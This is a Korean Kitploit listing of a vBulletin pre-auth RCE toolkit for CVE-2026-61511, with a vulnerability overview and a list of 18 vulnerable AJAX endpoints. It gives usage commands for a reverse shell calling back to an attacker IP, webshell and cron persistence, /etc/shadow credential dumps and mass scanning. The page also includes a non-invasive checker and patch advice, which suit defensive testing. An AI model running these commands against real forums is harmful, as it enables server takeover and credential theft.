Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-61511-PoC-Exploit — CVE-2026-61511 – vBulletin 사전 인증 RCE (CVSS 9.8). 취약한 버전 5.x/6.x (패치되지 않음). Endpoint Pool, AJAX, PHPFuck WAF 우회를 통한 다중 익스플로잇. 전체 툴킷: 리버스 셸, 프록시, 지속성, 웹셸, 데이터베이스 작업, 방화벽 제어, 로그 관리, 대량 스캔. 2가지 버전: 다중 익스플로잇 및 안전 점검. Python 3.8+ 윤리적으로 사용하고, 합법을 준수하세요. 🔒 | Kitploit
도구/GitHubGitHub/tc4dy/cve-2026-61511-poc-exploit
Network MappingVulnerability AnalysisExploitationWeb Application ExploitationPost-ExploitationWAF BypassPenetration TestingRemote Access ToolPayload Development

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Database Security
GitHubtc4dy/cve-2026-61511-poc-exploit

CVE-2026-61511-PoC-Exploit

CVE-2026-61511 – vBulletin 사전 인증 RCE (CVSS 9.8). 취약한 버전 5.x/6.x (패치되지 않음). Endpoint Pool, AJAX, PHPFuck WAF 우회를 통한 다중 익스플로잇. 전체 툴킷: 리버스 셸, 프록시, 지속성, 웹셸, 데이터베이스 작업, 방화벽 제어, 로그 관리, 대량 스캔. 2가지 버전: 다중 익스플로잇 및 안전 점검. Python 3.8+ 윤리적으로 사용하고, 합법을 준수하세요. 🔒

저장소 보기
4101개월 전아직 검토되지 않음

CVEPoC

CVE-2026-61511 – vBulletin 사전 인증 RCE 익스플로잇 및 검증 도구

Python 3.8+ CVSS Author vBulletin

⚠️ 윤리적 사용 전용 – 승인된 보안 테스트
이 저장소의 도구는 승인된 보안 전문가, 블루 팀, 침투 테스터만을 위한 것입니다.
승인되지 않은 컴퓨터 시스템 접근은 CFAA(미국), Computer Misuse Act(영국), TCK 243/244(터키) 및 전 세계의 유사 법률에 따라 불법입니다.


📖 취약점 개요

CVE‑2026‑61511은 vBulletin의 AJAX 템플릿 렌더링 엔진에서 발생하는 PHP eval() 주입 결함입니다.
영향을 받는 버전: 5.0.0 – 5.7.5 및 6.0.0 – 6.2.1.

작동 방식

  1. 다중 공격 엔드포인트 – 이 버그는 여러 AJAX 핸들러에 존재합니다:

    • /ajax/render/pagenav
    • /ajax/api/ad/replaceAdTemplate
    • /ajax/render/widget_php
    • /ajax/render/widget_tabbedcontainer_tab_panel
    • 다양한 /ajax/api/content_* /getIndexableContent 엔드포인트
  2. PHPFuck 인코딩 – 페이로드는 WAF 필터를 우회하고 임의의 PHP 코드 실행을 허용하는 PHP 연산자와 숫자의 시퀀스로 변환됩니다.

  3. 인증 불필요 – 공격자는 취약한 엔드포인트에 조작된 POST 요청을 보내 웹 서버의 권한으로 시스템 명령을 실행할 수 있습니다.

  4. 영향 – 전체 서버 장악, 데이터 탈취, 백도어, 수평 이동 및 지속성 확보. 버전을 업그레이드하세요!

패치

  • vBulletin 6.2.2 및 이전 버전용 Patch Level 1이 이 문제를 해결합니다.
  • 항상 최신 버전으로 업그레이드하세요.

🧰 도구

도구용도대상 사용자
exploit.py리버스 셸, 지속성, 파일 작업, 데이터베이스 덤프, 방화벽 관리, 로그 관리, 포트 포워딩, SSH 키 배포, 네트워크 스캔 및 대량 스캔(멀티 스레드)을 포함한 전체 도구 키트.레드 팀 / 승인된 침투 테스터
safecheck.py악성 페이로드를 실행하지 않고 취약점을 확인하는 비침습적 검증 도구. 버전을 감지하고 모든 엔드포인트를 테스트하며 상세 보고서를 생성합니다.블루 팀 / 보안 감사자

📊 기능 비교


🎯 사용 사례 요약


⚙️ 설치

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-61511-PoC-Exploit
cd CVE-2026-61511-PoC-Exploit
pip install -r requirements.txt

requirements.txt 내용:

root@kitploit:~
request
urllib3

매개변수 🌬️

시나리오

엔드포인트 풀 🅿️

🛡️ 책임 있는 사용

  • 소유하거나 명시적인 서면 허가를 받은 시스템에서만 이러한 도구를 사용하세요.
  • 승인되지 않은 접근은 불법이며 비윤리적입니다.
  • 작성자는 어떠한 오용에 대해서도 책임을 지지 않습니다.
  • 항상 해당 국가의 법률과 규정을 준수하세요.

이 소프트웨어는 교육 목적 및 승인된 보안 테스트 전용으로 제공됩니다.

도구 다운로드
기능exploit.pysafecheck.py
취약점 탐지✅✅
버전 탐지✅✅
다중 엔드포인트 테스트(18개 경로)✅✅
명령 실행✅❌
리버스 셸✅❌
파일 업로드/다운로드✅❌
지속성 메커니즘✅❌
웹 셸 배포✅❌
데이터베이스 작업✅❌
시스템 정보 수집✅✅
방화벽 관리✅❌
로그 관리✅❌
포트 포워딩✅❌
SSH 키 배포✅❌
네트워크 스캔✅❌
대량 스캔(멀티 스레드)✅❌
프록시 지원✅✅
JSON 보고서 출력✅✅
대화형 메뉴✅❌
비침습적(안전) 모드❌✅
상세/디버그 모드✅✅
사용자 정의 명령 실행✅❌
다중 명령 체이닝✅❌
원격 파일 읽기✅❌
원격 파일 쓰기✅❌
시스템 사용자 관리✅❌
방화벽 우회 기술✅❌
WAF 우회(PHPFuck)✅✅
시나리오권장 도구
블루 팀 – vBulletin 설치가 취약한지 확인safecheck.py
보안 감사 – 비침습적 취약점 평가safecheck.py
레드 팀 – 전체 익스플로잇을 포함한 승인된 침투 테스트exploit.py
버그 바운티 – 책임 있는 공개 테스트safecheck.py
대량 스캔 – 여러 대상의 취약점 확인exploit.py(탐지 전용)
침해 대응 – 시스템이 손상되었는지 확인safecheck.py
매개변수설명
-t, --target대상 URL (예: http://forum.com/vb)
--proxyHTTP 프록시 (예: http://127.0.0.1:8080)
--timeout요청 제한 시간(초) (기본값: 10)
--retry경로당 재시도 횟수 (기본값: 3)
--output상세 보고서를 JSON 파일로 저장
-v, --verbose상세 출력
-q, --quiet조용한 모드(최소 출력)
--lhost익스플로잇 필수 – 콜백용 IP
--lport콜백 포트 (기본값: 4444)
--threads대량 스캔용 스레드 수 (기본값: 5)
--exploit탐지 후 익스플로잇 수행
--full전체 공격(모든 모듈)
--shell리버스 셸 시작
--webshell웹 셸 설치 (/shell.php)
--persist지속성 설치(cron 작업)
--dump데이터베이스 덤프
--dump-creds자격 증명 덤프 (/etc/passwd, /etc/shadow)
--interactive성공적인 검증 후 대화형 메뉴
#시나리오명령
1빠른 취약점 확인python safecheck.py -t http://target.com/vb
2보고서 포함 상세 스캔python safecheck.py -t http://target.com/vb --output report.json -v
3리버스 셸python exploit.py -t http://target.com/vb --lhost 192.168.1.100 --lport 4444 --shell
4전체 공격(모든 모듈)python exploit.py -t http://target.com/vb --lhost 192.168.1.100 --full
5파일에서 대량 스캔python exploit.py -l targets.txt --lhost 192.168.1.100 --threads 20 --output results.json
6대화형 메뉴 모드python exploit.py -t http://target.com/vb --lhost 192.168.1.100 --interactive
#엔드포인트
1/ajax/render/pagenav
2/ajax/render/pagenav?template=page
3/ajax/api/ad/replaceAdTemplate
4/ajax/render/widget_php
5/ajax/render/widget_tabbedcontainer_tab_panel
6/ajax/api/content_infraction/getIndexableContent
7/ajax/api/content_video/getIndexableContent
8/ajax/api/content_text/getIndexableContent
9/ajax/api/content_report/getIndexableContent
10/ajax/api/content_redirect/getIndexableContent
11/ajax/api/content_privatemessage/getIndexableContent
12/ajax/api/content_poll/getIndexableContent
13/ajax/api/content_photo/getIndexableContent
14/ajax/api/content_link/getIndexableContent
15/ajax/api/content_gallery/getIndexableContent
16/ajax/api/content_event/getIndexableContent
17/ajax/api/content_channel/getIndexableContent
18/ajax/api/content_attach/getIndexableContent